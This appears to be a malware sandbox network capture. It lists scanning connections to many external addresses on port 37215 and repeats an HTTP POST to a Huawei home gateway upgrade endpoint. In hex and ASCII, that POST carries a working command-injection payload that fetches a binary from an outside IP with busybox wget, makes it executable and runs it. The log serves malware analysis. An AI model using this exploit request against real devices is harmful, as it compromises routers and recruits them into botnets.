Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 136.210.188.250:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 35.2.92.27:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.168.23.133:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 221.96.89.134:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.89.133.2:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.10.228.167:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.220.241.24:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 212.213.43.96:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.105.206.198:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.102.167.49:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 195.20.169.180:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.114.235.143:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.115.159.123:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 112.160.224.118:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.80.49.184:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.47.129.214:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.124.29.242:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.47.47.101:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 91.183.70.237:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.153.107.218:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.79.227.45:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 206.154.93.42:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.50.133.238:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.6.58.113:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 173.126.172.208:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 71.83.56.30:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.200.167.43:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 216.202.251.200:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.97.0.87:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.62.198.172:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.86.15.233:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 143.107.19.133:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.176.216.115:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.244.211.146:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.58.8.231:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.23.78.37:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.30.124.124:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 187.157.179.98:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 65.118.187.105:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.190.69.38:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.206.115.193:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.248.160.80:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.9.228.147:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.181.66.166:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 193.154.111.144:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.77.178.248:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.74.37.122:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 143.190.125.125:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 95.85.40.201:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 107.101.133.88:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.210.133.17:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.46.41.83:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 88.229.82.92:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 216.165.163.237:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.147.81.130:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.29.205.198:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 171.86.12.95:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 176.149.16.201:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 198.61.108.89:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.234.21.112:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.228.142.204:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.3.177.85:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.168.67.22:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.108.130.54:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.72.56.138:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.67.174.194:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.161.153.84:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.187.194.239:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.15.174.93:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.180.139.32:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 173.207.3.146:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.146.197.46:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.216.84.143:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.137.18.80:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 138.232.1.179:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.154.116.58:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.244.48.235:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.235.26.175:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.133.67.126:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.101.248.107:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 23.186.174.229:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.153.99.86:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 9.55.8.125:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.95.189.239:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.239.205.32:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.202.113.171:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 162.51.138.193:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.13.130.80:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.134.106.141:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.123.254.102:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.9.20.84:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.91.160.60:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.227.230.74:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.189.142.217:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.56.174.89:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.38.175.126:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 126.73.147.112:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.83.71.46:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.209.184.222:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.227.51.234:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.124.134.247:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.108.185.96:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.69.152.61:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.120.18.98:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.43.77.27:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.233.241.13:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 58.212.204.143:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.240.52.15:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.7.45.202:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 171.127.88.49:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.224.107.115:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 180.247.198.6:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 213.114.72.0:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.2.176.232:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.101.232.49:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.68.104.161:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.148.244.43:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.19.230.248:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.197.30.240:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 159.58.248.231:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 72.196.116.248:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.148.228.118:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 116.16.218.210:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.209.141.220:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.172.59.193:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.53.235.80:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.206.152.181:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 159.132.25.226:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 221.242.47.90:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.46.140.82:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 50.57.3.148:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.15.166.210:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 178.233.153.101:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.145.241.243:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.25.226.209:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.154.203.17:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.109.208.34:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.147.33.127:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.55.253.220:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.77.87.29:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.107.110.24:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 78.243.201.88:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.239.25.75:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.233.129.82:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.42.6.124:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 31.221.95.199:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 38.77.85.46:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.165.95.73:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 95.60.30.58:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.145.123.137:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.143.69.7:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 20.159.88.39:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.148.174.22:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.23.138.122:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.88.128.252:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.210.120.76:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.144.17.246:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.4.18.189:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 120.104.29.104:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 112.164.221.197:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 52.6.222.231:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.233.254.33:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.157.158.0:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 186.189.173.128:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.176.115.109:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.202.81.189:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 198.59.254.71:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.156.229.184:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.153.145.100:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 31.21.152.75:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.122.195.8:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.148.144.124:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 160.156.201.209:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 121.77.21.127:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.240.87.6:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.162.119.177:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.125.201.174:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 174.45.138.192:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.42.154.150:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.109.56.175:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.43.114.102:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.71.235.116:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.95.8.48:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.139.156.115:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.72.145.140:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.222.167.90:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.83.144.32:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.165.20.83:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.114.63.81:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.142.31.115:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 14.237.129.0:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 62.106.146.118:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.41.16.181:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 69.102.11.216:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.126.77.69:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.54.53.4:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 144.130.21.219:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.123.102.36:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.202.67.206:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.28.250.88:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.181.178.251:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.59.96.34:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.90.25.232:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 134.127.30.72:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.149.160.40:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.77.51.145:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.122.147.11:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 72.20.243.52:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.105.24.81:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.57.183.53:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.156.28.109:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.242.77.118:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.67.208.136:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.96.211.83:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.48.38.69:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.220.38.243:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 168.181.167.111:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 197.129.31.169:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 157.241.239.57:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.218.117.209:37215
Source: global traffic	TCP traffic: 192.168.2.13:32521 -> 41.250.153.104:37215

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox rm /tmp/.oxy; /bin/busybox wget -g 94.154.33.42 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 474Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 72 6d 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 34 2e 33 33 2e 34 32 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 